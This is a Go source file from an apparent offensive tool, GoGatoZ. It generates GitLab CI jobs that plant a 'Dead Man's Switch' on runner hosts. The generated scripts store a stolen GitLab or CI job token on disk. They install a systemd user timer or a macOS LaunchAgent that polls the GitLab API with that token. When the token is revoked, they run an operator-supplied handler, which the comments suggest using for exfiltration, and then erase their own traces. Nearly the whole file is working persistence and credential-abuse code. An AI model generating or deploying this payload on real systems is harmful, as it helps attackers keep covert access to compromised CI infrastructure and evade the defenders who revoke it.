package payloads

import (
	"fmt"
	"strings"
)

// DeadManSwitchOptions configures a persistence payload that monitors whether
// a GitLab token is still valid and triggers a handler command when the token
// is revoked (HTTP 401/403). This implements a Dead Man's Switch: as long as
// the compromised token remains active, the switch stays quiet. Once the
// defender revokes the token, the handler fires — useful for triggering
// backup exfiltration, credential rotation to a secondary token, or alerting
// the operator that access has been burned.
//
// Platform support:
//   - linux: systemd user service + timer for periodic checks and TTL self-removal
//   - macos: LaunchAgent plist with KeepAlive for automatic restarts
type DeadManSwitchOptions struct {
	Common        CommonOptions
	MonitorURL    string // endpoint to probe with token (default: "https://gitlab.com/api/v4/user")
	CheckInterval string // seconds between checks (default: "60")
	TTL           string // seconds before self-removal (default: "86400")
	Handler       string // command to run on token revocation (default: "echo token-revoked")
	Platform      string // "linux" or "macos" (default: "linux")
}

// GenerateDeadManSwitchYAML returns a GitLab CI job that installs a Dead Man's
// Switch on the runner host, monitoring a token endpoint and firing a handler
// when access is revoked.
func GenerateDeadManSwitchYAML(o DeadManSwitchOptions) string {
	name, stage := o.Common.defaults("dead-man-switch")

	script := buildDeadManSwitchScript(o)

	// Indent every line of the script by 6 spaces for YAML block scalar alignment.
	indented := indentScript(script, "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Dead Man's Switch)
# Monitors token validity and triggers handler on revocation
# Platforms: systemd (Linux), LaunchAgent (macOS)
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

func buildDeadManSwitchScript(o DeadManSwitchOptions) string {
	monitorURL := strings.TrimSpace(o.MonitorURL)
	if monitorURL == "" {
		monitorURL = "https://gitlab.com/api/v4/user"
	}

	checkInterval := strings.TrimSpace(o.CheckInterval)
	if checkInterval == "" {
		checkInterval = "60"
	}

	ttl := strings.TrimSpace(o.TTL)
	if ttl == "" {
		ttl = "86400"
	}

	handler := strings.TrimSpace(o.Handler)
	if handler == "" {
		handler = "echo token-revoked"
	}

	platform := strings.ToLower(strings.TrimSpace(o.Platform))
	if platform == "" {
		platform = "linux"
	}

	var b strings.Builder

	b.WriteString(`
_DMS_INSTALL() {
  echo "[*] Dead Man's Switch installation starting..."
  _TOKEN="${GITLAB_TOKEN:-${CI_JOB_TOKEN}}"
  if [ -z "$_TOKEN" ]; then
    echo "[-] No token available, aborting"
    return 1
  fi

`)

	switch platform {
	case "macos", "darwin":
		buildMacOSDeadManSwitch(&b, monitorURL, checkInterval, ttl, handler)
	default:
		buildLinuxDeadManSwitch(&b, monitorURL, checkInterval, ttl, handler)
	}

	b.WriteString(`
  echo "[*] Dead Man's Switch installation complete"
}

_DMS_INSTALL
`)

	return b.String()
}

func buildLinuxDeadManSwitch(b *strings.Builder, monitorURL, checkInterval, ttl, handler string) {
	fmt.Fprintf(b, `  # Linux: systemd user service
  echo "[*] Installing systemd Dead Man's Switch..."

  _SVC_DIR="$HOME/.config/systemd/user"
  mkdir -p "$_SVC_DIR"

  # Write check script
  _CHECK_SCRIPT="$HOME/.local/bin/dms-check.sh"
  mkdir -p "$(dirname "$_CHECK_SCRIPT")"
  cat > "$_CHECK_SCRIPT" << 'CHECKEOF'
#!/bin/sh
_TOKEN_FILE="$HOME/.config/dms/.token"
_TOKEN=$(cat "$_TOKEN_FILE" 2>/dev/null)
if [ -z "$_TOKEN" ]; then
  exit 1
fi
_STATUS=$(curl -sS -o /dev/null -w "%%{http_code}" -H "PRIVATE-TOKEN: $_TOKEN" "%s" 2>/dev/null)
if [ "$_STATUS" = "401" ] || [ "$_STATUS" = "403" ]; then
  %s
  rm -f "$_TOKEN_FILE"
fi
CHECKEOF
  chmod +x "$_CHECK_SCRIPT"

  # Store token
  mkdir -p "$HOME/.config/dms"
  echo "$_TOKEN" > "$HOME/.config/dms/.token"
  chmod 600 "$HOME/.config/dms/.token"

  # Write systemd service unit
  cat > "$_SVC_DIR/dms-monitor.service" << SVCEOF
[Unit]
Description=DMS Token Monitor

[Service]
Type=oneshot
ExecStart=$_CHECK_SCRIPT
SVCEOF

  # Write systemd timer unit
  cat > "$_SVC_DIR/dms-monitor.timer" << TMREOF
[Unit]
Description=DMS Token Monitor Timer

[Timer]
OnBootSec=30
OnUnitActiveSec=%ss
Persistent=true

[Install]
WantedBy=timers.target
TMREOF

  # Write TTL self-removal timer
  cat > "$_SVC_DIR/dms-cleanup.service" << CLNEOF
[Unit]
Description=DMS Self-Removal

[Service]
Type=oneshot
ExecStart=/bin/sh -c 'systemctl --user stop dms-monitor.timer; systemctl --user disable dms-monitor.timer dms-monitor.service dms-cleanup.timer dms-cleanup.service; rm -f $HOME/.config/systemd/user/dms-monitor.* $HOME/.config/systemd/user/dms-cleanup.*; rm -f $HOME/.local/bin/dms-check.sh; rm -rf $HOME/.config/dms; systemctl --user daemon-reload'
CLNEOF

  cat > "$_SVC_DIR/dms-cleanup.timer" << TTLEOF
[Unit]
Description=DMS TTL Self-Removal Timer

[Timer]
OnBootSec=%ss
Unit=dms-cleanup.service

[Install]
WantedBy=timers.target
TTLEOF

  # Enable and start
  systemctl --user daemon-reload 2>/dev/null
  systemctl --user enable --now dms-monitor.timer 2>/dev/null
  systemctl --user enable --now dms-cleanup.timer 2>/dev/null
  echo "[+] systemd Dead Man's Switch active (check every %ss, TTL %ss)"

`, monitorURL, handler, checkInterval, ttl, checkInterval, ttl)
}

func buildMacOSDeadManSwitch(b *strings.Builder, monitorURL, checkInterval, ttl, handler string) {
	fmt.Fprintf(b, `  # macOS: LaunchAgent
  echo "[*] Installing LaunchAgent Dead Man's Switch..."

  _AGENT_DIR="$HOME/Library/LaunchAgents"
  mkdir -p "$_AGENT_DIR"

  # Write check script
  _CHECK_SCRIPT="$HOME/.local/bin/dms-check.sh"
  mkdir -p "$(dirname "$_CHECK_SCRIPT")"
  cat > "$_CHECK_SCRIPT" << 'CHECKEOF'
#!/bin/sh
_TOKEN_FILE="$HOME/.config/dms/.token"
_TOKEN=$(cat "$_TOKEN_FILE" 2>/dev/null)
if [ -z "$_TOKEN" ]; then
  exit 1
fi
_STATUS=$(curl -sS -o /dev/null -w "%%{http_code}" -H "PRIVATE-TOKEN: $_TOKEN" "%s" 2>/dev/null)
if [ "$_STATUS" = "401" ] || [ "$_STATUS" = "403" ]; then
  %s
  rm -f "$_TOKEN_FILE"
  # Self-remove
  launchctl unload "$HOME/Library/LaunchAgents/com.dms.monitor.plist" 2>/dev/null
  rm -f "$HOME/Library/LaunchAgents/com.dms.monitor.plist"
  rm -f "$HOME/Library/LaunchAgents/com.dms.cleanup.plist"
  rm -f "$HOME/.local/bin/dms-check.sh"
  rm -rf "$HOME/.config/dms"
fi
CHECKEOF
  chmod +x "$_CHECK_SCRIPT"

  # Store token
  mkdir -p "$HOME/.config/dms"
  echo "$_TOKEN" > "$HOME/.config/dms/.token"
  chmod 600 "$HOME/.config/dms/.token"

  # Write LaunchAgent plist for monitoring
  cat > "$_AGENT_DIR/com.dms.monitor.plist" << 'PLISTEOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.dms.monitor</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>PLACEHOLDER_CHECK_SCRIPT</string>
  </array>
  <key>StartInterval</key>
  <integer>%s</integer>
  <key>KeepAlive</key>
  <dict>
    <key>SuccessfulExit</key>
    <false/>
  </dict>
  <key>RunAtLoad</key>
  <true/>
  <key>StandardOutPath</key>
  <string>/tmp/dms-monitor.log</string>
  <key>StandardErrorPath</key>
  <string>/tmp/dms-monitor.err</string>
</dict>
</plist>
PLISTEOF
  sed -i '' "s|PLACEHOLDER_CHECK_SCRIPT|$_CHECK_SCRIPT|g" "$_AGENT_DIR/com.dms.monitor.plist" 2>/dev/null || \
    sed -i "s|PLACEHOLDER_CHECK_SCRIPT|$_CHECK_SCRIPT|g" "$_AGENT_DIR/com.dms.monitor.plist" 2>/dev/null

  # Write TTL self-removal LaunchAgent
  _CLEANUP_TIME=$(date -v+%ss +%%H:%%M 2>/dev/null || date -d "+%s seconds" +%%H:%%M 2>/dev/null || echo "23:59")
  cat > "$_AGENT_DIR/com.dms.cleanup.plist" << 'CLEANEOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.dms.cleanup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>launchctl unload ~/Library/LaunchAgents/com.dms.monitor.plist 2>/dev/null; rm -f ~/Library/LaunchAgents/com.dms.monitor.plist ~/Library/LaunchAgents/com.dms.cleanup.plist; rm -f ~/.local/bin/dms-check.sh; rm -rf ~/.config/dms</string>
  </array>
  <key>StartInterval</key>
  <integer>%s</integer>
  <key>RunAtLoad</key>
  <false/>
</dict>
</plist>
CLEANEOF

  # Load agents
  launchctl load "$_AGENT_DIR/com.dms.monitor.plist" 2>/dev/null
  launchctl load "$_AGENT_DIR/com.dms.cleanup.plist" 2>/dev/null
  echo "[+] LaunchAgent Dead Man's Switch active (check every %ss, TTL %ss)"

`, monitorURL, handler, checkInterval, ttl, ttl, ttl, checkInterval, ttl)
}
